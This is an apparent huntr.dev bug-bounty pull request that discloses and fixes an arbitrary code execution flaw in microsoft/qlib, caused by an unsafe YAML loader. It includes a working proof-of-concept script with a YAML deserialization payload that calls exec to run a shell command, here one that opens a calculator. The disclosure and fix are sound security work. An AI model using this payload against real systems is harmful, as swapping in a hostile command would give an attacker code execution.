Security Fix for Arbitrary Code Execution - huntr.dev

[huntr-helper]

https://huntr.dev/users/Anon-Artist has fixed the Arbitrary Code Execution vulnerability 🔨. Think you could fix a vulnerability like this?

Get involved at https://huntr.dev/

Q | A
Version Affected | ALL
Bug Fix | YES
Original Pull Request | 418sec#1
Vulnerability README | https://github.com/418sec/huntr/blob/master/bounties/pip/qlib/1/README.md

User Comments:

📊 Metadata *

Arbitrary Code Excecution in microsoft/qlib. Qlib is an AI-oriented quantitative investment platform, which aims to realize the potential, empower the research, and create the value of AI technologies in quantitative investment.

Bounty URL: https://www.huntr.dev/bounties/1-pip-qlib

⚙️ Description *

This package was vulnerable to Arbitrary code execution due to a use of a known vulnerable function load() in yaml

💻 Technical Description *

Fixed by avoiding unsafe loader.

🐛 Proof of Concept (PoC) *

Create the following PoC file:
exploit.py

import os
import qlib.workflow.cli as cli

exploit = """!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""
open('exploit.yml','w+').write(exploit)
cli.workflow('exploit.yml','workflow','/tmp')
os.system('rm exploit.yml')

Execute the following commands in another terminal:

python3 exploit.py

Check the Output:

xcalc will pop up.

🔥 Proof of Fix (PoF) *

After fix it will not popup a calc

👍 User Acceptance Testing (UAT)

After fix functionality is unaffected.

[you-n-g]

Thanks so much!

[JamieSlome]

@you-n-g, if you want more security fixes and patches like this in the future, you can let security researchers know that they can win bounties protecting your repository by copying this small code snippet into your README.md:

[![huntr](https://cdn.huntr.dev/huntr_security_badge_mono.svg)](https://huntr.dev)

👇 👇 👇